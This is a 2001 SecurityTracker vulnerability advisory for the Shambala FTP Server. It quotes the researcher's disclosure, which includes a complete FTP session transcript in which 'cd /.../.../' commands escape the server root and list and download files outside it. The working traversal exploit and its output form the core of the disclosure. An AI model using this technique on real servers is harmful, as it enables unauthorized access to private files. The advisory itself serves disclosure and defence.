Shambala FTP Server Gives Remote Users Access to Any Files on the FTP Server's Drive
|
|
SecurityTracker Alert ID: 1001698 |
|
SecurityTracker URL: http://securitytracker.com/id/1001698
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 7 2001
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
|
Description:
A vulnerability has been reported in the Shambala FTP server that allows remote users to access files on the server located outside of the server's root directory.
A remote user can change to any directory and view files.
If a remote user sends the command "CWD ..." (or "cd ..." in the default FTP client), the server will change directories up to the higher level directory.
A transcript of a demonstration exploit scenario is provided in the Source Message.
|
Impact:
A remote user can traverse the directory tree on the target FTP server and obtain files on the server that are located outside of the FTP server's root document directory.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.evolvable.com/ (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Windows (NT), Windows (95), Windows (98), Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 07 Jun 2001 14:04:57 -0400
Subject: Shambala FTP server Directory Traversal
|
This is a multi-part message in MIME format.
--------------33B0A33A1FE995217D8106E9
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
======================================================================
Shambala FTP server Directory Traversal
Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d
vicente F0x no rulas weyete!
======================================================================
------------------------=[Brief Description]=-------------------------
Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH
also GET files remotely.
----------------------------=[Plataforms]=-----------------------------
Windows 9.x
Windows NT
windows 2000
-----------------------------=[Summary]=---------------------------------
When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.
Exploit:
alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx
---------- owner group 283 21-maj-01 17:55
index-_-1_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-2_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-3_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-4_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-5_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-6_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-7_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-8_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-9_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-10_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-11_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-12_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-13_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-14_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-15_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-16_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_0_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_0_0_-1.htm
---------- owner group 283 21-maj-01 17:55 .htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-2.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-3.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-4.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-5.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-6.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-7.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-8.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-9.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-10.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-12.htm
---------- owner group 283 21-maj-01 18:08
index-_0_-1_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_1_0_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_-1_0_-11.htm
226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>
EXPLOIT... ...
ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 15444 04-maj-01 14:26 SCAN.log
---------- owner group 140340 04-maj-01 14:05
MAILS-PRESIDENCIA.txt
---------- owner group 466944 18-sep-99 09:32 Shambala.exe
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG
---------- owner group 31 21-maj-01 17:50
passwordsxxx.txt
d--------- owner group 0 21-maj-01 17:50 Web
226 Transfer complete.
ftp>
ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe
d--------- owner group 0 18-jan-01 15:39 Netscape 6
d--------- owner group 0 18-jan-01 14:50 Netscape 6
Setup
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe
.
.
.
.
.
---------- owner group 168 21-maj-01 19:07
raza-alt3kx.txt
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.
alt3kx@machine:/tmp$ cat raza-alt3kx.txt
Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>
alt3kx@machine:/tmp$
-------------------------------=[Patch]=------------------------------
The recomended action is to changue the persmissions or define
individual directory for users anonymous with files not compromise.
-------------------------=[Company Compromise]=-----------------------
http://www.evolvable.com
--------------33B0A33A1FE995217D8106E9--
|
|
